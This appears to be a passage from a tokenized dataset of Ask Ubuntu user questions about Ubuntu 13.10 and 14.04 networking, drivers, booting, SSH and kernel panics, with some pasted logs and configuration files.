[ 232.556870 ] [ < ffffffff81084641 > ] ? worker_thread+0x121/0x410 may 3 23:14:37 saturnv kernel : [ 232.556878 ] [ < ffffffff81084520 > ] ? rescuer_thread+0x3e0/0x3e0 may 3 23:14:37 saturnv kernel : [ 232.556885 ] [ < ffffffff8108b312 > ] ? kthread+0xd2/0xf0 may 3 23:14:37 saturnv kernel : [ 232.556892 ] [ < ffffffff8108b240 > ] ? kthread_create_on_node+0x1d0/0x1d0 may 3 23:14:37 saturnv kernel : [ 232.556900 ] [ < ffffffff8172637c > ] ? ret_from_fork+0x7c/0xb0 may 3 23:14:37 saturnv kernel : [ 232.556907 ] [ < ffffffff8108b240 > ] ? kthread_create_on_node+0x1d0/0x1d0 may 3 23:14:37 saturnv kernel : [ 232.556910 ] code : 5c 5d c3 0f 1f 44 00 00 83 03 01 bb 02 00 00 00 eb d9 48 83 fa 01 b8 01 00 00 00 77 14 f3 90 48 89 c1 49 87 0c 24 48 85 c9 74 d1 < 48 > 83 f9 01 76 ec 4d 89 e0 ba ea 02 00 00 48 c7 c6 9f c4 06 a0 any ideas what might cause this ?
460282	unable to set static ip address in ubuntu 14.04	i 've never had so much problems setting a network interface card to static addressing . i 'm not sure what has changed , but i can only seem to get this thing to work if it 's set to obtain the address via dhcp . i 've tried multiple attempts to get this to work and referred to documentation on here as well as on other sites . here is a copy of my /etc/network/interfaces file : # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) # first setup attempt # auto lo # iface lo inet loopback # iface lo inet interface # auto eth0 # iface eth0 inet static # address 192.168.100.25 # netmask 255.255.255.0 # gateway 192.168.100.254 # dns-nameservers 8.8.8.8 8.8.4.4 # current setup # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 # comment out # iface eth0 inet dhcp # add these lines iface eth0 inet static address 192.168.100.25 # define ip address network 192.168.100.0 # define network address netmask 255.255.255.0 # define subnet mask broadcast 192.168.100.255 # define broadcast address gateway 192.168.100.254 # define default gateway dns-nameservers 192.168.100.254 # define name server - router/gateway restarting the networking services fails . i end up trying to reboot . at that point the network interface does not come back up if i force it back up with sudo ip link set eth0 up the interface comes up , but shows no addressing other than broadcast information . it does not connect to the internet . help with this is greatly appreciated .
460286	computer wo n't boot after shutdown/reboot	i currently have a toshiba sattelite c660d which dual boots ubuntu 14.04 ( had same issue with 13.10 ) and windows 8 . every time i shutdown or reboot my laptop from ubuntu , i can only get it back on , if i first run bootrepair . it seems as if it ca n't read the sdd , since it just hangs before the grub-screen . does anyone have any idea how to solve this issue ? edit : i have found that it 's not being solved by using boot-repair . after just booting from another live-usb , and immediately turning it back off , it works as well .
460291	ubuntu 13.10 continuous beeping	i 'm using ubuntu 13.1064b on a dell inspiron n5010 . sometimes when i boot into ubuntu , i get a continuous beeping noise on my sound card output . my laptop 's internal speakers stopped working a long time ago , so i have no way of confirming if it 's an issue with the audio output . this noise starts only after ubuntu boots , for i can hear it only after i select ubuntu from the grub . shutting down the system and rebooting once works sometimes , but other times it takes multiple reboots for the beeping to stop . i 'm a real beginner . how do i go about solving this ?
460293	find missing/moved video clip kdenlive	after moving a video clip used by kdenlive from one folder to another , kdenlive can no longer find the video clip and tells me `` missing clip '' . how do i tell kdenlive where the new location of the video clip is ? or do i have to delete the missing clip , add it back in , then re-add all of the crops/transitions/effects back onto the track ?
460295	system settings reverted to old gnome after installing gnome flashback	i tried reverting to the classic gnome by installing the gnome flashback . now my system settings are also in classic gnome style after i uninstalled gnome flashback : i ca n't even adjust the brightness now since the classic gnome settings does n't have it . how do i turn it back to normal ? thanks in advance . i 'm using ubuntu 13.10 .
460296	multiple connections through ssh	we have a server which we connect through and do remote tasks . however , around 4-5 people login with the same username and password . can this situation cause anything weird ?
460297	ubuntu 14.04 + nvidia-331-updates makes a blank desktop screen	i upgraded my installation from 13.10 to 14.04 . the problem is that whenever i install the nvidia drivers from the gui , upon reboot or trying to login again it only shows the wallpaper of my desktop and nothing else . the mouse does move around , but nothing works . i am unable to open a terminal or do anything else . if i go into the tty console and purge the drivers , then things seem to work again . i have an optimus setup , with an onboard intel and discrete nvidia gtx770m card . it 's a 64-bit architecture . i really need to work with cuda , and was hopeful after hearing that nvidia-prime was released , but this is a real downer . any help on this ?
460300	how to install ubuntu on network accessible mini-itx just like a raspbian on a raspberry ?	i have an asus h81i-plus mini-itx machine with intel core i3 processor with a 60 gb kingston ssd ( intended to use only for booting ) . i want to install ubuntu on this machine . but , i do n't have an external monitor or an external keyboard . i can connect the machine to my home router via a lan cable . i have a fully equipped laptop ( win 7 ) to do all the other configuration stuff . with the same kind of setup ; i could install raspbian on my raspberry and could access it and configure it via ssh . raspbian 's initial configuration comes with a default password for the root ( pi ) . http : //www.raspberrypi.org/documentation/installation/installing-images/windows.md http : //glynrob.com/hardware/raspberry-pi-headless/ can i do a similar type of installation on my mini-itx machine with ubuntu ? ofcourse , i can connect the ssd to my laptop via usb casing to write a pre-installed ubuntu ( if something like that exists just like the raspbian ) . i am not a tech-savvy person , so , excuse me if i do n't make any sense . thanks a lot !
460303	ubuntu 14.04 webbrowser.app does not see flash	the new webbrowser.app now in ubuntu 14.04lts 64bit does not play flash . i have adobe flash installed and working both in firefox and chrome , but the browser.app says it is not installed . when i try to play flash i get the message that i need to install the latest 32bit flash , but i have a 64bit system and 64bot flash is installed.. any suggestions ?
460307	what is the -d switch in rsync ?	what is the -d switch in rsync ? okay manpage says -d same as -- devices -- specials -g , -- group preserve group -- devices preserve device files ( super-user only ) -- specials preserve special files but what are device files ? what are special files ?
460308	icon cursor not changing properly	i downloaded the unity tweak tool in order to change my cursor to the oxy-zion , which i love . i extracted the oxy-zion cursor set to the icons folder , and for the most part , it works , except when i scroll over to the launcher or the panel . certain programs also revert back to the dmz-white ( default ) cursor . i 'd like to be able to have just 1 cursor , the one i choose , work across the board . any help would be much appreciated .
460309	cant start tor browser	i downloaded tor but ca n't start it . this is what i keep getting ~ $ start-tor-browser start-tor-browser : command not found i did download it , but just ca n't open it .
460310	next music button not working	my multimedia keys are working ( play , pause , previous song , etc ) but the `` next song '' wo n't work . i already tried using the `` xdotool '' to emulate it and also changed the keyboard shortcut . nothing worked . how can i verify on terminal whats happening or what can i do ?
460311	xubuntu and lubuntu wo n't shutdown or restart	hi i have an old laptop acer 2420 , before lubuntu 14.04 ( clean install ) it cant restart or shutdown , when i try the live cd with the same lubuntu 14.04 and after eject the disk the os wont shutdown with enter , i have to use alt-control-printscreen-reisub
460316	install mysql in ubuntu for xampp in 14.04	i was having problem since some time using xampp . in terminal the mysql starts as normal but when it comes to app , it saying mysql stopped working . so i removed mysql and hope installing it again will fix the issue . please share the command for install mysql in ubuntu 14.04 .
460319	new laptop and weird post-install boot behavior	just recently grabbed myself an asus rog g750js , and the first thing i did with it was set up a ubuntu 14.04 dual boot alongside the stock windows 8.1 os . quick note about the computer 's memory : it came set up with : a 1 tb hard drive : partitioned into a d and e drive ( 512 gb each ) both containing nothing . a 256 gb solid state drive : partition for the windows os , the efi , and a 128gb storage drive ( the f drive ) . so , i deleted the d drive and from windows partition editor , and used a 14.04 usb stick i made to begin the fun of sticking ubuntu on the pc . i made 4 partitions : a 500 mb boot partition , a 20gb root paritition , a 4 gb swap space , and a home partition using the remaining space . however , i like running my dual boots through windows boot manager , so i downloaded easybcd 2.2 on my windows partition and used it to add ubuntu 14.04 lts to the boot menu ( via the `` add entry '' tab ) and re-write the mbr so that windows boot manager would boot before grub v2 . despite all of this however , when i restart/shut down my laptop , the efi still boots into grub v2 first . in fact , sometimes it even boots into grub v2 's shell and i have to type `` exit '' before i can do anything . if i boot into the windows boot manager from grub , i can select ubuntu 14.04 from windows boot manager , so that is set up correctly . windows boot manager is just not `` in front '' - how can i fix this ? i thought re-writing the mbr would have done the trick , but it 's not working . one weird thing i noticed is that in easybcd in the list of bootable partitions , there 's : 1 . ) my windows partition 2 . ) my ubuntu 14.04 lts partition 3 . ) a random partition labelled `` ubuntu '' 4 . ) another random partition labelled `` ubuntu '' i 'm not sure where 3 and 4 are coming from or if they are the root of my issue , just thought i would share . also , one more quick favor : when i installed ubuntu , i checked the box to encrypt my home partition . this caused an issue i have seen before , where this also causes the swap partition to be encrypted and then causes a boot error because the os ca n't unencrypt the swap partition at boot . the solution is to unmount the swap partition , unencrypt it , and re-mount it . for the life of me , i ca n't remember the shell commands to do this , however , i have seen guides on this website on how to do it before . i 'm having trouble finding them at the moment , though ... can someone link me to one ? thanks , you all are the best ! ryan
460324	realtek 8188e not working after routine update	i have a toshiba satellite c55-a that has a realtek 8188e wireless card . when i first installed kubuntu to this machine , i had to start with 13.10 to get the card to work , but it continued to work when i upgraded to 14.04 after the initial install . now , there was just a routine recommended update , and after rebooting , i ca n't get a wireless connection . i have searched extensively for a solution and tried the one here , but got errors when running make . i really do not want to have to start over with 13.10 every time there are routine system updates , so if anyone can help , i will be grateful . the connection was working fine since i installed kubuntu a couple weeks ago , and only went on the fritz after the update today . i found this in the logs : [ 13.100650 ] realtek : no valid ssid , checking pincfg 0x40f79a2d for nid 0x1d [ 13.100651 ] realtek : enabling init asm_id=0x9a2d codec_id=10ec0269 [ 53.887772 ] wlan0 : authenticate with 00:18 : f8:4a : a2 : e2 [ 55.019037 ] wlan0 : send auth to 00:18 : f8:4a : a2 : e2 ( try 1/3 ) [ 55.855573 ] wlan0 : send auth to 00:18 : f8:4a : a2 : e2 ( try 2/3 ) [ 56.868445 ] wlan0 : send auth to 00:18 : f8:4a : a2 : e2 ( try 3/3 ) [ 57.869344 ] wlan0 : authentication with 00:18 : f8:4a : a2 : e2 timed out numerous times followed by : [ 6136.219868 ] wlan0 : authenticate with 00:18 : f8:4a : a2 : e2 [ 6136.229893 ] wlan0 : send auth to 00:18 : f8:4a : a2 : e2 ( try 1/3 ) [ 6136.231531 ] wlan0 : authenticated [ 6141.237997 ] wlan0 : deauthenticating from 00:18 : f8:4a : a2 : e2 by local choice ( reason=3 ) [ 6152.081403 ] wlan0 : authenticate with 00:18 : f8:4a : a2 : e2 [ 6152.091258 ] wlan0 : send auth to 00:18 : f8:4a : a2 : e2 ( try 1/3 ) [ 6152.092859 ] wlan0 : authenticated [ 6157.097625 ] wlan0 : deauthenticating from 00:18 : f8:4a : a2 : e2 by local choice ( reason=3 ) [ 6161.162629 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 6164.165572 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready i have no idea what it means or how to fix it , though . edit : i have searched for 3 days for answers to getting this to work . i got a netgear n150 usb wna1000m adapter , and after following a youtube video for that installation , the best i can get is a few seconds of connection . it shows in connection manager as being connected , but i can not even ping an outside source . i tried blacklisting the drivers for the onboard realtek adapter , and that made no difference with the netgear usb . it appears that there is something in 14.04 that keeps it from working properly with some wireless adapters , or at least on this toshiba laptop . if i could find out what usb adapter would work out of the box , i 'd return the one i have and go that route .
460328	where can i find the sudo commands to work on the ubuntu grub file ?	i am a newbie and need help with the sudo command . i am trying to edit the grub.cfg file via the etc\default\grub . the problem is that i do n't know the sudo commands , particulary , the permission command and how to use . i 'm planning on changing the boot menu to my satisfaction . this would include the order of the menu options , boders , colers and etc .
460330	installed `` windows wireless drivers '' but can not launch it . it does not show up in the dash search	very new to linux and ubuntu . after some issues getting the new 14.04 installation not to freeze due to my gpu , i was able to poke around here for answers and all is up and running well now . i need to install a wireless driver for my wireless usb adapter and found a very helpful youtube video that shows you to download this `` windows wireless drivers '' ndiswrapper program and how to install the driver . only problem is i installed it , it indicates its been installed in the software center . but when i search using the dash it doesnt come up ( as it does quite readily in the video ) . i tried installing other programs to make sure this wasnt a widespread issue , and all those programs come up just fine . i tried uninstalling and reinstalling . still no result to launch the program . any reason that it would n't come up ?
460336	dockbarx autostart breaks shutdown menus	since i installed dockbarx in ubuntu 14.04 , i am unable to access the shutdown menus ( shutdown , log-out , lock , et cetera ) from the top-right gear-like menu . i can click on it , but nothing happens . if i remove dockbarx from autostart , and i start it manually , it works again as it should , but it 's a bit annoying . someone else have this problem ? how can i fix it ?
460337	qualcom evdo internet device not working	when i plug usb cdma device following log can be found with dmesg command : [ 647.070249 ] usb 3-1 : new usb device found , idvendor=05c6 , idproduct=6000 [ 647.070259 ] usb 3-1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 647.070265 ] usb 3-1 : product : qualcomm cdma technologies msm [ 647.070280 ] usb 3-1 : manufacturer : qualcomm , incorporated [ 647.070280 ] usb 3-1 : manufacturer : qualcomm , incorporated [ 647.071323 ] zte_ev 3-1:1.0 : zte_ev converter detected [ 647.071496 ] usb 3-1 : zte_ev converter now attached to ttyusb0 [ 647.071864 ] zte_ev 3-1:1.1 : zte_ev converter detected [ 647.072027 ] usb 3-1 : zte_ev converter now attached to ttyusb1 [ 647.072408 ] zte_ev 3-1:1.2 : zte_ev converter detected [ 647.072497 ] usb 3-1 : zte_ev converter now attached to ttyusb2 [ 647.072826 ] zte_ev 3-1:1.3 : zte_ev converter detected [ 647.072904 ] usb 3-1 : zte_ev converter now attached to ttyusb3 [ 647.072963 ] usb-storage 3-1:1.5 : usb mass storage device detected [ 647.073214 ] scsi10 : usb-storage 3-1:1.5 [ 648.073701 ] scsi 10:0:0:0 : direct-access oem qualcom evdoreva 2.31 pq : 0 ansi : 0 [ 648.073998 ] sd 10:0:0:0 : attached scsi generic sg2 type 0 [ 648.080093 ] sd 10:0:0:0 : [ sdc ] attached scsi removable disk [ 742.227968 ] zte_ev ttyusb0 : zte_ev converter now disconnected from ttyusb0 [ 742.227980 ] zte_ev 3-1:1.0 : device disconnected [ 742.228393 ] zte_ev ttyusb1 : zte_ev converter now disconnected from ttyusb1 [ 742.228413 ] zte_ev 3-1:1.1 : device disconnected [ 742.228651 ] zte_ev ttyusb2 : zte_ev converter now disconnected from ttyusb2 [ 742.228668 ] zte_ev 3-1:1.2 : device disconnected [ 742.229876 ] zte_ev ttyusb3 : zte_ev converter now disconnected from ttyusb3 [ 742.229890 ] zte_ev 3-1:1.3 : device disconnected [ 742.394290 ] usb 3-1 : reset full-speed usb device number 6 using xhci_hcd [ 742.394311 ] xhci_hcd 0000:00:14.0 : setup error : setup context command for slot 5 . [ 742.506143 ] usb 3-1 : reset full-speed usb device number 6 using xhci_hcd [ 742.506191 ] xhci_hcd 0000:00:14.0 : setup error : setup context command for slot 5 . [ 742.618139 ] usb 3-1 : reset full-speed usb device number 6 using xhci_hcd [ 742.634790 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8801eeb21480 [ 742.634801 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8801eeb21500 [ 742.634806 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8801eeb214c0 [ 742.634811 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8800a3248d40 [ 742.634828 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8800a3248d00 [ 742.634830 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8800a32489c0 [ 742.634831 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8800a3248980 [ 742.634833 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8800a3248a40 [ 742.634834 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8800a3248a00 [ 742.634836 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8800a3248c80 [ 742.634837 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8800a3248cc0 [ 742.635483 ] xhci_hcd 0000:00:14.0 : warn set tr deq ptr cmd failed due to incorrect slot or ep state . [ 742.635505 ] zte_ev 3-1:1.3 : zte_ev converter detected if following log would n't have seen device works expectedly : [ 742.634790 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8801eeb21480 [ 742.634801 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8801eeb21500 [ 742.634806 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8801eeb214c0 [ 742.634811 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8800a3248d40 [ 742.634828 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8800a3248d00 [ 742.634830 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8800a32489c0 [ 742.634831 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8800a3248980 [ 742.634833 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8800a3248a40 [ 742.634834 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8800a3248a00 [ 742.634836 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8800a3248c80 [ 742.634837 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8800a3248cc0 [ 742.635483 ] xhci_hcd 0000:00:14.0 : warn set tr deq ptr cmd failed due to incorrect slot or ep state . sometimes it happens frequenly and ca n't use internet.currently i am using kubuntu 14.04 upgraded from kubuntu 13.10 .
460342	installing amd catalyst 13.1 proprietary driver on ubuntu 14.04	how can i install amd catalyst driver ? ( first time using ubuntu ) i was told to install fglrx but it froze when booting to desktop , so i fixed that issue and uninstalled fglrx . i followed this procedure , some commands were outdated/obsolete in addition to the posts being old and for versions before 13.10 , i am on ubuntu 14.04 . i was given this link and when i get to this partsudo apt-get install fglrx-legacy it can not be found . i followed all the steps correctly previous to this part . i tried looking at other questions but they just take me back to these two links , there is the ubuntu amd catalyst install on sourceforge does anyone have experience with it does it work ? i 'd rather do it myself , but i might try this . my question is are there any up to date posts that i can follow to install this driver ? or could someone show me how to do it here step by step ? below is my graphics card info 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rv710 [ radeon hd 4350/4550 ]
460343	my netbook screen started shaking after 14.04 update	i am having a little issue after upgrading to lubuntu 14.04 . my screen started shaking horizontaly as if i applied a water effect on it.. like the ed , edd and eddie cartoon . do you have any clues on how to address this ? it 's an eeepc 1201ha .
460344	ubuntu 14.04 from 13.10 ( using iso ) - what about existing applications working in 13.10	in my system i am running ubuntu 13.10 and have downloaded the ubuntu 14.04 i386 iso image . if i install 14.04 by creating bootable pen drive , will all the applications existing in my system ( 13.10 ) continue to exist or do i have to upgrade using the software updater option for safety reasons ? what will be the pros and cons of both the upgrade methods ? direct software updater using iso to reinstall
460348	newbie question . how do i know if my netbook is 32bit or 64bit and appropriate for ubuntu ?	i do n't know where to look in the properties to find what i have . this netbook is about 3-4 years old .
460349	ubuntu 14.04 wo n't start	i have had ubuntu 14.04 for a couple of weeks now with no problems . then suddenly , i started my computer up , logged into ubuntu and it only showed my wallpaper . there were no icons and the terminal did n't work . i had made no changes to my computer and it was working fine when i logged in only an hour before . i have a dual boot with windows 7 ( which is working fine . ) i can still access my files using ctrl + alt + f2 and shut down but is there any way to fix this problem ? thanks
460350	installing ubuntu 14.04 within windows 7	can you install ubuntu 14.04 with wubi within windows 7 so that it can be uninstalled from windows 7 if desired .
460354	ifconfig does not recognize eth0 , only wlan0 and lo ( ubuntu 14.04 , macbrook pro )	ifconfig -a produces : lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1812 errors:0 dropped:0 overruns:0 frame:0 tx packets:1812 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:209274 ( 209.2 kb ) tx bytes:209274 ( 209.2 kb ) wlan0 link encap : ethernet hwaddr 28 : cf : e9:1a:43 : cd inet addr:192.168.12.11 bcast:192.168.12.255 mask:255.255.255.0 inet6 addr : fe80 : :2acf : e9ff : fe1a:43cd/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:11512 errors:0 dropped:0 overruns:0 frame:0 tx packets:11320 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:9240182 ( 9.2 mb ) tx bytes:2316647 ( 2.3 mb ) lspci -nn | grep ethernet produces : 03:00.0 ethernet controller [ 0200 ] : broadcom corporation device [ 14e4:16a3 ] ( rev 10 ) cat /etc/network/interfaces produces : auto lo iface lo inet loopback any ideas on how i can get eth0 ? thanks !
460357	unstable brix box control servers . advice ?	we are running brix box control servers that connect to a mesh via a telegesis dongle and live as minions on a saltstack that have proven unsteady . i have one on my desk that looks to be having a wifi related kernel panic . we need a stable image on a solid but cost efficient machine that can go to mass production . ( all they do is collect data from the mesh then send commands through said mesh and push data to the master ) system : gb-xm14-1037 brix box chipset : intel速 nm70 proc : 3rd generation intel速 celeron速 1037u lan : gigabit lan ( realtek rtl8111e ) wifi : azurewave rtl8188ce various ssd 's ( current machine is running an intel ssdmceac060b3 ) so my question is this : does anyone have any advice on setting up a solid control server ? we were using ubuntu desktop , with teamviewer , and saltstack . no other packages or additions . i think : we should move to server edition since they run headless anyway go without tv and rely on ssh exclusively be sure auto update is not on i have been advised to : switch to red hat since ubuntu is `` bleeding edge and may not be stable enough for an enterprise system '' obtain drivers for all hardware directly from manufacturer rather than apt-get my linux experience : new user that has shared an office with a linux guru for 1.7 years ( no longer ) worked on physical repairs of robots running a linux mint distro and know basic commands and know to read man pages . what i have found while googling my problems with these servers . thank you for your time and i would like to preemptively apologize for any stupid questions due to my ignorance or a basic lapse of googling .
460359	how to start bash process , disconnect terminal , then be able to reclaim process	is there a way , in vanilla bash ( no additional packages ) , to start a process , somehow detach it or send it to the background , and then pick it back up later ? my specific use case is to ssh to a machine , start a long-running program ( like a database backup ) , close my ssh terminal and have the program continue , then later be able to ssh back in to the machine and re-attach/reclaim the process in my terminal ( assuming it 's still running ) . i know of the screen package , and given the volume of recommendations i 've received about it , i think i 'll give it a try in the future . one point to clarify though is that my question is in general about bash , not just specific to ssh . i 'd like to be able to do the same thing locally and issue a long-running command , then close my terminal . from my reading , i 'm starting to get the impression that this might be an ill-posed question . if so , can someone suggest to me which component ( s ) i might need to dig into a little deeper .
460361	why /var/log/auth.log is using diffrent timezone ?	i 've installed fail2ban on a ubuntu box ( 14.04 ) but it did n't work correctly . as i tried to inspect the reason , i discovered that the timezone which is being used by the /var/log/auth.log file is different from the system timezone . here were what i did to change the timezone : # rm /etc/localtime # ln -s /usr/share/zoneinfo/asia/ho_chi_minh /etc/localtime date command output : # date sun may 4 10:38:28 ict 2014 then i triggered an invalid login from ssh , this is what i got : # tailf /var/log/auth.log may 3 23:17:01 host-1 cron [ 24432 ] : pam_unix ( cron : session ) : session closed for user root may 3 23:39:24 host-1 sshd [ 24439 ] : error : could not load host key : /etc/ssh/ssh_host_ed25519_key may 3 23:39:27 host-1 sshd [ 24439 ] : invalid user roots from 123.22.x.x may 3 23:39:27 host-1 sshd [ 24439 ] : input_userauth_request : invalid user roots [ preauth ] as you can see , the system datetime is may 4 10:38 , but the output of auth.log says that it is using may 3 23:39 as the time . any explanations and solutions for this ?
460362	how to recompress a .deb package	i have a .deb file that needed to be altered . i have decompressed the .deb file and made the necessary changes . how to i re-compress the file back into a .deb file .
460368	can system event sounds be assigned in ubuntu 14.04 , rather than the default system sounds ?	i was wondering if there is a way to use custom system event sounds in ubuntu 14.04 ? the only settings available in the system settings → sounds tab is the default theme . if so , must this be edited by hand , or is there an application that can access & modify the default system event sounds ? thanks for any help in advance .
460369	ubuntu /usr/bin/ld : can not find -lgcc_s	i am compiling a fortran program by using g77 on ubuntu 14.04 , i got the following error : ubuntu /usr/bin/ld : can not find -lgcc_s did n't you ever have experience with such problem ?
460370	does `cd/dvd creator` verify an optical disk after writing to it ?	does cd/dvd creator verify an optical disk after writing to it ? in other words , is the data read back and compared to the original ? edit : the os is ubuntu 12.04 . screenshot of the application screenshot of the about window of the application .
460371	trouble using ssh and avahi	solved : make sure that libnss-mdns is installed ! i 'm having trouble using ssh'ing from my netbook to my desktop using a .local hostname . every so often , i have to reset the router i use , which resets the addresses it give out to my devices , so a while ago i set up avahi to get around this* . the /etc/avahi/services/ssh.service file is the standard one copied from the documentation : < ? xml version= '' 1.0 '' standalone='no ' ? > < ! -- *-nxml-* -- > < ! doctype service-group system `` avahi-service.dtd '' > < ! -- see avahi.service ( 5 ) for more information about this configuration file -- > < service-group > < name replace-wildcards= '' yes '' > % h < /name > < service > < type > _ssh._tcp < /type > < port > 22 < /port > < /service > < /service-group > this used to work fine , but now for some reason when i try to ssh from my netbook to my desktop , i get the following error message ( note i changed my pc 's hostname in this output ) : user @ netbook > > ssh pc.local -vvv openssh_6.2p2 ubuntu-6ubuntu0.3 , openssl 1.0.1e 11 feb 2013 debug1 : reading configuration data /home/username/.ssh/config debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug2 : ssh_connect : needpriv 0 ssh : could not resolve hostname pc.local : name or service not known i can ssh from my netbook to my pc when i put in the ip address manually , and when i 've set up /etc/hosts correctly ( so the daemon on my pc is working fine ) , it only stops working when i try to use the .local address . ssh'ing in the other direction ( pc- > netbook ) works fine , even when using a .local hostname . avahi also appears to be working fine : user @ netbook > > avahi-browse -a -t+ + wlan0 ipv6 netbook ssh remote terminal local + wlan0 ipv6 netbook [ < mac address > ] workstation local + wlan0 ipv6 netbook remote disk management local + wlan0 ipv4 netbook ssh remote terminal local + wlan0 ipv4 netbook [ < mac address > ] workstation local + wlan0 ipv4 netbook remote disk management local + wlan0 ipv4 pc ssh remote terminal local + wlan0 ipv4 pc [ < mac address > ] workstation local + wlan0 ipv4 pc remote disk management local + wlan0 ipv6 pc ssh remote terminal local + wlan0 ipv6 pc [ < mac address > ] workstation local + wlan0 ipv6 pc remote disk management local the netbook is running lubuntu 13.10 ; note that i did change to lubuntu recently , and i only recall seeing this error with lubuntu and not with plain ubuntu . my desktop is running ubuntu 13.10 . any help would be appreciated ! *i am aware that can set up my router to permanently give set addresses to both devices , and i will do that if i ca n't resolve this issue , but i 'd prefer to try and fix this rather than work around it . eta : pinging the pc from the netbook with the .local hostname does n't work ( unknown host ) . edit 2 : contents of /etc/nsswitch.conf # /etc/nsswitch.conf # # example configuration of gnu name service switch functionality . # if you have the `glibc-doc-reference ' and `info ' packages installed , try : # `info libc `` name service switch '' ' for information about this file . passwd : compat group : compat shadow : compat hosts : files mdns4_minimal dns [ notfound=return ] mdns4 networks : files protocols : db files services : db files ethers : db files rpc : db files netgroup : nis
460373	python3-distupgrade package upgrade fails in xubuntu 13.10	while doing a routine apt-get upgrade , the system tried to upgrade the python3-distupgrade package , and that 's where things failed . the relevant error lines were : preparing to replace python3-distupgrade 1:0.205.5 ( using ... /python3-distupgrade_1 % 3a0.205.6_all.deb ) ... fatal python error : py_initialize : ca n't import _frozen_importlib traceback ( most recent call last ) : file `` < frozen importlib._bootstrap > '' , line 171 , in < module > segmentation fault ( core dumped ) does anybody recognize this or know of a solution ? i 'm loathe to try to upgrade to 14.04 while there is a package problem as this kind of thing can bring a whole distribution upgrade crashing to a halt . a google search has proven uninformative .
460375	trouble resetting root password	i am having trouble resetting the root password using all but the most drastic of ways but i am still unable to change it ! the error message is as follows : sorry password does not match ( even when it does match i get the same error ) password authentication token manipulation error . password unchanged ! !
460377	how do i disable drivers check after login in kubuntu 14.04	every time i login after full system restart i see running process `` drivermanager '' ( ca n't give full description because it 's happen for short amount of time ) , this is annoying because of high cpu usage ( python ? ) . how do i disable it ? currently i have changed line in /usr/share/dbus-1/services/org.kubuntu.drivermanager.service from name=org.kubuntu.drivermanager to name=org.kubuntu.drivermanager.disabled this prevent this process from run on startup , but also broke âťdriver managerâť . is there a better solution ?
460378	password field of login screen is disabled	i 'm using ubuntu 14.04 , here in the 'login screen ' the password field is disabled , this issue also occurs sometimes during 'lock screen ' . i do n't want to remove password from my account nor do i want auto login . my account is with administrator privileges . going to terminal using control + alt + f1 , then back to gui with control + alt + f7 , does n't enables the password field .
460380	sftp transfer file to /var/www/mywebsite	i installed ssh and wanted to use sftp to upload the file . i use client machine connect to my ubuntu machine . it connected and upload the file to /home/myuser/mywebsite , but not /var/www/mywebsite . do i need do anything to send file to /var/www/mywebsite using sftp ? your help and information is great appreciated , regards , inung
460381	update failed because of power failure , and i can not open further	i have tried to upgrade ubuntu 13.10 saucy to 14.04 trusty tahr , and somehow my laptop power failed , i failed to note where it stopped . what are the things i can do , to debug it , and to fix it . what i have tried boot select advanced mode select the top most option ( with recovery ) , i think linux 3.24 , something like that result fails to even boot , and gives me gibberish lines of text that i failed to note .
460383	frequent kernel panics always accompined by severe graphical glitching . is my machine possessed or in need of a new motherboard ?	ubuntu 14.04 i 'm having incredibly frequent kernel panics that have been getting worse for the last week , after i installed and then removed gnome and gde . at this point , it is almost impossible to work on the machine , as it dies at least within five minutes of booting , if not sooner . i assume it 's all panics , but about 50 % of the time , it dies without a panic screen . sometimes , it just goes into a hard reboot , sometimes , the screen blacks out and it does not want to restart , after killing these , the machine will not load the bios until the power is cut for ~5 seconds . otherwise , it will display a panic screen , which at this point almost always is shredded or somehow corrupted graphically , with garbage pixels stranded or the text smeared across the screen . if left to sit , the graphical glitches will occasionally change or flash . the panics themselves are often different , some `` tried to execute mx-protected page ' , some `` cpu : 1 pid : 0 tainted '' , some `` cpu : 0 pid : 0 not tainted '' , etc . always accompanied by some manner of graphical glitching , either moments before it crashed or while it 's 